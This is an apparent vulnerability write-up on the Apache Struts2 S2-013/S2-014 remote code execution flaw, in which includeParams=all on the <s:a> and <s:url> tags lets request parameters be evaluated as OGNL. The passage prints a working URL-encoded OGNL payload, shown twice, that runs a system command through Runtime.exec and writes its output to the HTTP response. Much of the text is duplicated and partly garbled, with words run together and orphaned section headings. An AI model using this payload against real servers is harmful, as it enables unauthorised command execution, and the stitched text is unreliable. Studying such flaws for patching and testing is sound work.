The text details Apache Struts2 vulnerabilities S2-013 and S2-014, affecting versions 2.0.0 to 2.3.14.1. The vulnerability lies in the <s:a> and <s:url> tags, which have an includeParams attribute set to all. This causes the request's GET and POST parameters to be placed in the URL and rendered via OGNL, leading to arbitrary command execution. A proof-of-concept URL is provided. S2-014 is a patch for S2-013, which failed to block ${ognl_exp} OGNL expression execution.
In the Struts2 tag library, <s:a> and <s:url> both have an includeParams attribute, which can be set to none, get, or all. According to the official documentation, their meanings are as follows:
none - the link does not include any request parameters (default)
get - the link only includes parameters and their values from the GET request
all - the link includes all parameters and their values from both GET and POST requests
<s:a>The <s:a> tag is used to render a hyperlink. When includeParams=all is set to "all", it places all GET and POST parameters from the current request into the URL's GET parameters. During this process, the parameters undergo OGNL evaluation, leading to an arbitrary command execution vulnerability.
Example arbitrary command execution POC:
http://your-ip:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D
S2-014 is a strengthened fix for S2-013. The S2-013 fix overlooked the ${ognl_exp} OGNL expression execution vector, so S2-014 was issued as a supplementary patch for it.
S2-013 / S2-014 Remote Code Execution Vulnerability
<s:a>and<s:url>tags, which have anincludeParamsattribute set toall. This causes the request's GET and POST parameters to be placed in the URL and rendered via OGNL, leading to arbitrary command execution. A proof-of-concept URL is provided. S2-014 is a patch for S2-013, which failed to block${ognl_exp}OGNL expression execution.Affected versions: 2.0.0 - 2.3.14.1
Vulnerability details:
Test environment setup
How it works & testing
In the Struts2 tag library, <s:a> and <s:url> both have an includeParams attribute, which can be set to none, get, or all. According to the official documentation, their meanings are as follows:
<s:a>The <s:a> tag is used to render a hyperlink. When includeParams=all is set to "all", it places all GET and POST parameters from the current request into the URL's GET parameters. During this process, the parameters undergo OGNL evaluation, leading to an arbitrary command execution vulnerability.
POC for arbitrary command execution:
Example arbitrary command execution POC: http://your-ip:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D
S2-014 is a strengthened fix for S2-013. The S2-013 fix overlooked the ${ognl_exp} OGNL expression execution vector, so S2-014 was issued as a supplementary patch for it.